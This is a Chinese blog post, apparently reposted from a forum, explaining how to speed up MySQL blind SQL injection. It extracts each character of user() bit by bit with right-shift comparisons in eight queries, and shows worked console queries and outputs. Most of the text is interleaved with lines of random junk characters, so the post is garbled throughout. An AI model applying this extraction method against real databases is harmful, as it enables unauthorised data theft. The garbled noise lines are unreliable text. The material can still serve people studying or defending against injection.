关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位

+ e, d9 n: g, M. o0 \; B
5 s1 Q. p5 v$ @' L/ m0 a+ a
下面将以查询mysql数据库当中user()的第一位为例:

, T  I2 a& ], Q  ~/ h4 J7 w

% _+ B1 p+ n$ i3 B% f9 yps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)
1 t# V0 s4 S. K; a% B3 H
8 Z: k! s# _- g

首先执行如下sql语句:
. s- r, ]* ?* \+ T% e$ i
4 D; y+ ?$ t4 o

mysql> select (ascii((substr(user(),1,1))) >> 7)=0;



我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的


- n( j! E) W. V4 A
# Q3 @) x4 q+ }2 o% w第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1
' R1 m4 N- z; a1 h/ ]& C9 A

5 D& ]) s! l9 `( m3 c" a! n
如果运算结果为1,说明第一位为0,不为1
/ e7 i7 T% N4 [$ w4 ~
0 L# H# m' u7 A6 y
& {7 [0 W& m3 j, I# W! e
* V/ ^4 e, X" q0 B5 i- h+————————————–+
$ Z' Y8 K& h3 x! g
| (ascii((substr(user(),1,1))) >> 7)=0 |
. q( B9 s- P6 k6 H, Y1 N4 R! d5 |
; A; S& I- r6 X" b& G0 c+————————————–+
# W) b( K' _$ p# [" }$ D' o
* F* r8 ~- t$ _$ z| 1 |
9 i  F: C" {9 }. s5 C! [
+————————————–+
% K3 W& e* q2 s% W! i
6 k6 u- M: ]! c: o0 b1 row in set (0.00 sec)
" a; `$ {$ _. Y, e
这样我们就确定这个8bit的ascii的第一位为0

, [7 z  }- y9 K+ T% l; o( G

第二次我们来做6次右偏移来确定前两位
* u% b$ c3 Q' E7 @( k; [

, \0 K. z+ x7 |$ c0 F! h4 j
2 o; e" j' T) t8 J2 ~+ e$ r前两位可能是01或00,即依然可以与0做比较,

mysql> select (ascii((substr(user(),1,1))) >> 6)=0;
0 {; j" R6 _9 r& a5 k, n: W
+————————————–+
$ h3 K; }/ t& {+ K6 ?
  ]( k$ J( ^( T) q1 e& n| (ascii((substr(user(),1,1))) >> 6)=0 |

+————————————–+
$ c7 K% N& J- P# N4 X
5 p, U; k& _5 F* Q) I) @| 0 |

* k, U: k3 U2 B# f# T9 K+————————————–+
2 t+ a1 V- C9 d+ }& P, T# G$ ^
. R- j: F/ j  \( I, ^' m+ J! G1 row in set (0.00 sec)
; _! I1 o; z! }6 V5 z
- x$ V+ f7 ]. {' ?/ V. ]
) O" Y# o& t8 Z4 r
, H% W8 E; e0 f% p" F+ Y结果为0,即第二位为1


; S$ _! j  o8 S. V5 v( |
开始猜测前三位为010或011
  m: k+ e0 i0 O  j
; ~2 T% \7 n1 S. O. A/ P" n" Q

让我们看看010和011的ascii码是多少


2 p" v* a/ u# A! Z+ `
分别查询select b’011′ select b’010′

- W4 G  f' _, ^$ E8 o! T' H: F: `

6 Q, r1 ?. U, H4 k获得结果 010 = 2 011 = 3
" `! L, W. F% m  u
! h4 _# }- A: N2 n  t7 m
! \* a! o# ^) n* v: H$ n/ c' D
执行如下sql:



. ^+ o# C9 q$ K2 L% d* [mysql> select (ascii((substr(user(),1,1))) >> 5)=2;

+————————————–+

, `3 B7 m; k3 ]" N| (ascii((substr(user(),1,1))) >> 5)=2 |
$ e# E- v4 h& S2 r$ F
+————————————–+
8 a- T! o( N0 x/ E2 X
9 R) i# J( P% X$ T% {| 0 |
+ R6 A  R/ @$ f6 J5 \" o/ [" o5 {
3 P8 G: t; n5 {. r+————————————–+
# ?2 a' ^" n: D, S1 T: T/ B. B
即前三位不为010,而是011
# J2 w( {) B4 p! j0 G0 @6 g

$ c" f+ R) s5 ~4 z$ Z! C! B
直到获得最后一位

2 U$ x& M3 J: ~

! ]/ b' A: L4 [0 j$ O+ U. O最终结果为:01110010

) I' P/ H! [  z+ E0 H. X( V
3 P( w4 B. _  ]  X
  n2 H8 G  ~% S转换一下:
  B  I) E. y! d

3 m: m/ S  ~( Z8 ]
select b’01110010′
+ {* C$ e2 ~  X
9 Z+ o  j5 M) d( n$ c9 r
& ~& Q/ [( T8 J
$ `/ o) a9 k) ?/ X; @, r+ w3 L6 D查询结果
/ q8 u& M' D7 A, z9 c

+ A2 Z; N! ~; w1 u/ l1 b
+————-+
* K: E  |0 s5 i7 Y# ~
8 g( @; i+ C$ t2 a- `& ]  h| b’01110010′ |
7 c  K0 Q4 i4 ~( D2 T5 S; Y2 ^% y
6 p9 q2 e: S" a+————-+
6 Y& ]6 u- U' D6 X5 r7 Y
; X3 j4 \" n) U| r |

; X9 l# @8 @6 ~, L+————-+
% r( O* e9 p/ N
* G7 ?( v; k2 B% b, _1 row in set (0.00 sec)
5 p8 c+ T/ _! a1 A
1 U2 @$ P2 t  q  }8 a. n2 E3 v

$ B' O# _9 b4 o这样我们就获得了user()的第一位.其它位依此类推

5 z7 L5 c8 ~/ o  `